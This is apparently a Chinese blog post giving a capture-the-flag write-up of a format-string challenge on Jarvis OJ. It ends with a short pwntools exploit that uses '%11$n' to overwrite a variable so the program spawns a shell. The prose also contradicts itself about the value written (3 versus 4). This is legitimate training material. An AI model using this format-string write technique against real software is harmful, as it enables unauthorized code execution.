Jarvis OJ---fm

简单的一个格式化字符串的漏洞

image.png

从程序之中我们可以看到,只要我们的x=4,那么就会调用system函数,从而getshell,但是我们进去发现x==3

image.png
image.png

这里 0x0000000a 便是我们输入的字符串,相对于栈上的偏移位置是 11,所以我们只要将x的值覆盖为3,那么我们的目的就达到了。

from pwn import *

p = remote("pwn2.jarvisoj.com",9895)

payload = p32(0x0804A02C) + '%11$n'
p.sendline(payload)
p.interactive()
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 135,292评论 19 139
  • 1. Java基础部分 基础部分的顺序:基本语法,类相关的语法,内部类的语法,继承相关的语法,异常的语法,线程的语...
    子非鱼_t_阅读 31,886评论 18 399
  • 8086汇编 本笔记是笔者观看小甲鱼老师(鱼C论坛)《零基础入门学习汇编语言》系列视频的笔记,在此感谢他和像他一样...
    Gibbs基阅读 37,591评论 8 114
  • 2016年8月23日 我只知道我是一个躲在心灵世界里的小姑娘。我什么成就都没有,寄生在父母给的家里卑微地活着。 因...
    逸黎阅读 174评论 2 2
  • 是不是经常有牛股买了,而又经常的从你身边擦肩而过? 是的!经常懊悔没有拿住,也不知什么原因,历史总是惊人的相似! ...
    严小松阅读 341评论 0 1